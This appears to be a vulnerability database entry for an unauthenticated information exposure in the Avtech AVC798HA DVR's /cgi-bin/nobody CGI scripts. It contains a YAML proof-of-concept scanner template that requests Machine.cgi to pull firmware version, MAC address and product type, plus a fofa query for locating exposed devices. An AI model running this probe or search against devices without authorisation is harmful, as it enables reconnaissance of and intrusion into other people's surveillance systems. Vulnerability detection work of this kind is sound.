avtech-dvr-exposure: Avtech AVC798HA DVR Information Exposure

日期: 2025-08-01 | 影响软件: Avtech AVC798HA DVR | POC: 已公开

漏洞描述

Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication. fofa: app="AVTECH-视频监控"

PoC代码[已公开]

id: avtech-dvr-exposure

info:
  name: Avtech AVC798HA DVR Information Exposure
  author: geeknik
  severity: low
  verified: true
  description: |-
    Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication.
    fofa: app="AVTECH-视频监控"
  reference:
    - http://www.avtech.com.tw/
  tags: avtech,dvr,exposure
  created: 2023/06/24

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/nobody/Machine.cgi?action=get_capability
    expression: response.status == 200 && response.body.bcontains(b"Firmware.Version=") && response.body.bcontains(b"MACAddress=") && response.body.bcontains(b"Product.Type=")
expression: r0()

相关漏洞推荐